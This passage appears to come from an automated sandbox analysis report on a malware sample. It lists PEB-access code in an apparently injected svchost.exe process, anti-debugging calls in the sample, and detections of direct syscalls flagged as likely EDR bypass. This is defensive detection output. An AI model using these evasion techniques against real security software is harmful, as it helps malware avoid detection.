            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA456 mov eax, dword ptr fs:[00000030h]1_2_032EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322645D mov eax, dword ptr fs:[00000030h]1_2_0322645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325245A mov eax, dword ptr fs:[00000030h]1_2_0325245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032364AB mov eax, dword ptr fs:[00000030h]1_2_032364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032644B0 mov ecx, dword ptr fs:[00000030h]1_2_032644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BA4B0 mov eax, dword ptr fs:[00000030h]1_2_032BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA49A mov eax, dword ptr fs:[00000030h]1_2_032EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032304E5 mov ecx, dword ptr fs:[00000030h]1_2_032304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h]1_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h]1_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h]1_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h]1_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304B00 mov eax, dword ptr fs:[00000030h]1_2_03304B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322CB7E mov eax, dword ptr fs:[00000030h]1_2_0322CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h]1_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h]1_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]1_2_03302B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]1_2_03302B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]1_2_03302B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]1_2_03302B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h]1_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h]1_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FAB40 mov eax, dword ptr fs:[00000030h]1_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D8B42 mov eax, dword ptr fs:[00000030h]1_2_032D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228B50 mov eax, dword ptr fs:[00000030h]1_2_03228B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEB50 mov eax, dword ptr fs:[00000030h]1_2_032DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h]1_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h]1_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h]1_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h]1_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]1_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]1_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]1_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EBFC mov eax, dword ptr fs:[00000030h]1_2_0325EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BCBF0 mov eax, dword ptr fs:[00000030h]1_2_032BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]1_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]1_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]1_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]1_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]1_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]1_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEBD0 mov eax, dword ptr fs:[00000030h]1_2_032DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA24 mov eax, dword ptr fs:[00000030h]1_2_0326CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EA2E mov eax, dword ptr fs:[00000030h]1_2_0325EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h]1_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h]1_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BCA11 mov eax, dword ptr fs:[00000030h]1_2_032BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEA60 mov eax, dword ptr fs:[00000030h]1_2_032DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h]1_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h]1_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h]1_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h]1_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h]1_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h]1_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286AA4 mov eax, dword ptr fs:[00000030h]1_2_03286AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304A80 mov eax, dword ptr fs:[00000030h]1_2_03304A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268A90 mov edx, dword ptr fs:[00000030h]1_2_03268A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h]1_2_0326AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h]1_2_0326AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]1_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]1_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]1_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230AD0 mov eax, dword ptr fs:[00000030h]1_2_03230AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h]1_2_03264AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h]1_2_03264AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B892A mov eax, dword ptr fs:[00000030h]1_2_032B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C892B mov eax, dword ptr fs:[00000030h]1_2_032C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]1_2_032AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]1_2_032AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC912 mov eax, dword ptr fs:[00000030h]1_2_032BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]1_2_03228918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]1_2_03228918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov edx, dword ptr fs:[00000030h]1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]1_2_032D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]1_2_032D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC97C mov eax, dword ptr fs:[00000030h]1_2_032BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0946 mov eax, dword ptr fs:[00000030h]1_2_032B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304940 mov eax, dword ptr fs:[00000030h]1_2_03304940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]1_2_032309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]1_2_032309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov esi, dword ptr fs:[00000030h]1_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]1_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]1_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE9E0 mov eax, dword ptr fs:[00000030h]1_2_032BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]1_2_032629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]1_2_032629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C69C0 mov eax, dword ptr fs:[00000030h]1_2_032C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032649D0 mov eax, dword ptr fs:[00000030h]1_2_032649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA9D3 mov eax, dword ptr fs:[00000030h]1_2_032FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov ecx, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A830 mov eax, dword ptr fs:[00000030h]1_2_0326A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]1_2_032D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]1_2_032D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC810 mov eax, dword ptr fs:[00000030h]1_2_032BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]1_2_032BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]1_2_032BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6870 mov eax, dword ptr fs:[00000030h]1_2_032C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6870 mov eax, dword ptr fs:[00000030h]1_2_032C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03242840 mov ecx, dword ptr fs:[00000030h]1_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260854 mov eax, dword ptr fs:[00000030h]1_2_03260854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234859 mov eax, dword ptr fs:[00000030h]1_2_03234859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234859 mov eax, dword ptr fs:[00000030h]1_2_03234859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230887 mov eax, dword ptr fs:[00000030h]1_2_03230887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC89D mov eax, dword ptr fs:[00000030h]1_2_032BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA8E4 mov eax, dword ptr fs:[00000030h]1_2_032FA8E4
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00426DA1
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0042202E SetUnhandledExceptionFilter,0_2_0042202E
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtClose: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
